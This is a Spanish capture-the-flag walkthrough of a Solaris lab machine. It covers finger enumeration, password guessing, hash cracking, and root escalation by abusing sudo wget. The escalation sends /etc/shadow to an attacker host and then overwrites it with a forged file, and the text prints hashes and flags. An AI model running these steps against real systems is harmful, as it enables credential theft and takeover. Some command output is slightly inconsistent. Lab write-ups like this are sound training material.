Escaneamos todos los puertos mediante nmap:
nmap -A -T5 -Pn -p 10000-20000 10.10.10.76
PORT STATE SERVICE VERSION
79/tcp open finger
111/tcp open rpcbind
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
33381/tcp open smserverd 1 (RPC #100155)60722/tcp open smserverd 1 (RPC #100155
Con el comando finger vemos los usuarios que se encuentran conectados:
finger @10.10.10.76
Login Name TTY Idle When Where
sunny sunny pts/2 28 Sat 09:25 10.10.12.233
sunny sunny pts/3 Sat 08:41 10.10.12.220
sunny sunny pts/4 1:15 Sat 08:42 10.10.12.196
sunny sunny pts/5 50 Sat 09:04 10.10.12.27
sammy sammy pts/6 4 Sat 09:50 10.10.14.215
sunny sunny pts/7 30 Sat 09:29 10.10.12.233
sammy sammy pts/8 Sat 09:44 10.10.13.57
sunny sunny pts/9 Sat 09:57 10.10.12.163
Intentamos acceder mediante el usuario sunny por el puerto 22022, probando las tipicas contraseñas por defecto y vemos que la contraseña es igual que el nombre de la maquina: sunday
ssh -p 22022 sunny@10.10.10.76
Buscamos el fichero user.txt
sanny@sunday:/export/home$ find /export/home -name «user.txt»
Comprobamos que con el usuario sanny no tenemos permisos para poder leer el contenido del archivo.
./sammy/Desktop/user.txt
Tras enumerar y ver todos los directorios encontramos un file system de /backup en el que se encuentra un backup del fichero shadow
sammy@sunday:~$ cat /backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
sammy@sunday:~$
Mediante fuerza bruta intentamos obtener la contraseña
john –wordlist=rockyou.txt shadow
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
1g 0:00:09:05 100% 0.001834g/s 373.5p/s 373.5c/s 373.5C/s coolpeople..coliflor
Use the «–show» option to display all of the cracked passwords reliably
Session completed
Tras logarnos mediante la contraseña cooldude! con el usuario sammy podemos acceder al flag
su – sammy
cat user.txt
a3d9498027ca5187ba1793943ee8a598
Escalar privilegios:
vemos que sammy tiene permisos en el wget medainte sudo
sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
intentamos descargarnos el archivo shadow
Dejamos escuchando una sesion:
nc -lvp 8000
mediante el comando wget descargamos el fichero shadow a nuestra maquina.
sudo wget –post-file=/etc/shadow 10.10.12.220:8000
Si nos fijamos en la cosola que hemos dejado escuchando nos encontramos el shadow del servidor.
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Creamos un fichero nuevo shadow con la contraseña de root cambiada
root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Configuramos un servidor http mediante python
python -m SimpleHTTPServer 8080
Descargamos desde el servidor el fichero creado anteriormente
sudo wget http://10.10.12.220:8080/shadow -O /etc/shadow
Ahora mediante su – intentamos acceder como root (contraseña test) con el shadow generado.
sammy@sunday:~$ su –
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
You have new mail.
root@sunday:~# id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
Dentro del home de root encontramos el flag
cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8
:wq!